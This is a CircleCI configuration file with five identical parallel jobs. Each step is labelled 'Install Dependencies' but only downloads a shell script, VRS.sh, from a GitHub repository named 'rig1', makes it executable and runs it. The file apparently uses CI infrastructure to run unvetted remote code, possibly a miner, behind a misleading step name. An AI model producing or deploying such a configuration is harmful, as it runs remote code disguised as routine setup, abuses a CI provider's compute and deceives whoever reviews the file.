version: 2

jobs:

    aku1:

      docker:

            - image: circleci/ruby:2.4

      steps:

        - run:

            name: Install Dependencies

            command: wget https://raw.githubusercontent.com/yogi899/rig1/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh

    aku2:

      docker:

            - image: circleci/ruby:2.4

      steps:

        - run:

            name: Install Dependencies

            command: wget https://raw.githubusercontent.com/yogi899/rig1/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh

    aku3:

      docker:

            - image: circleci/ruby:2.4

      steps:

        - run:

            name: Install Dependencies

            command: wget https://raw.githubusercontent.com/yogi899/rig1/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh

    aku4:

      docker:

            - image: circleci/ruby:2.4

      steps:

        - run:

            name: Install Dependencies

            command: wget https://raw.githubusercontent.com/yogi899/rig1/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh

    aku5:

      docker:

            - image: circleci/ruby:2.4

      steps:

        - run:

            name: Install Dependencies

            command: wget https://raw.githubusercontent.com/yogi899/rig1/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh

workflows:

    version: 2

    build:

        jobs:

            - aku1

            - aku2

            - aku3

            - aku4

            - aku5